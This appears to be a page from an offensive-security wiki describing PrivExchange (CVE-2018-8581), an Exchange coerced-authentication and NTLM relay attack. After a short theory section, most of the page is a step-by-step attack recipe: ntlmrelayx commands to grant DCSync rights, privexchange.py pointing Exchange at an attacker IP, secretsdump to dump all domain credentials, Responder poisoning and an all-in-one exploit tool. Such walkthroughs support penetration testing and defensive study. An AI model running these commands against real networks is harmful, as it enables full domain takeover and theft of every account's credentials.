PrivExchange
CVE-2018-8581
Theory
PrivExchange relay on the PushSubscription coerced authentication, PushSubscription is an API on Exchange Web Services that allows to subscribe to push notifications. Attackers abuse it to make Exchange servers authenticate to a target of their choosing. The coerced authentication is made over HTTP, which is particularly powerful when doing NTLM relay (because of the Session Signing and MIC mitigations).
As Exchange servers usually have high privileges in a domain (i.e. WriteDacl, see Abusing ACLs), the forced authentication can then be relayed and abused to obtain domain admin privileges (see NTLM Relay and Kerberos Unconstrained Delegations).
Practice
On February 12th 2019, Microsoft released updates for Exchange which resolved
the coerced authentication issue
the fact that Exchange servers had overkill permissions leading attacker to a full domain compromission.
First, start the NTLM relay that will escalate privileges
# NTLM relaying is used to relay connexion and give DCSync privileges
ntlmrelayx.py -t ldap://$DC --escalate-user $USER_TO_ESCALATEUsing PrivExchange, we can log in on Exchange Web Services and call the API. The user must have a mailbox to make the coerced authentication.
privexchange.py -d $DOMAIN -u '$DOMAIN_USER' -p '$PASSWORD' -ah $ATTACKER_IP $EXCHANGE_SERVER_TARGETWe can now dump domain credentials throught DCSync
secretsdump.py $DOMAIN/$USER_TO_ESCALATE@$DC -just-dcIf you don't have any credentials, it is still possible to relay the authentication to make the API call. The httpattack.py script can be used with ntlmrelayx.py to perform this attack. It uses NTLM Relaying with LLMNR / NBT-NS to relay captured credentials over the network.
Using the modified httpattack.py, we can use ntlmrelayx to perform this attack.
#Backup the old httpattack.py
cd /PATH/TO/impacket/impacket/examples/ntlmrelayx/attacks/
mv httpattack.py httpattack.py.old
#Replace it
wget https://raw.githubusercontent.com/dirkjanm/PrivExchange/master/httpattack.py
#Edit the attacker_url parameter (the host to which Exchange will authenticate)
sed -i 's/attacker_url = .*$/attacker_url = "$ATTACKER_URL"/' httpattack.py
#Build the env
cd /PATH/TO/impacket
virtualenv venv && source venv/bin/activate
pip install .
#Start relay
ntlmrelayx.py -t https://exchange.server.EWS/Exchange.asmxWe can now use LLMNR/NBT-NS/mDNS poisoning with responder, to capture credentials and relay them:
responder -i eth0Exchange2domain is a all in One tools of Privexchange exploit. You only need to open the web server port, so no high privileges are required.
python2.7 Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServeripReferences
Last updated
Was this helpful?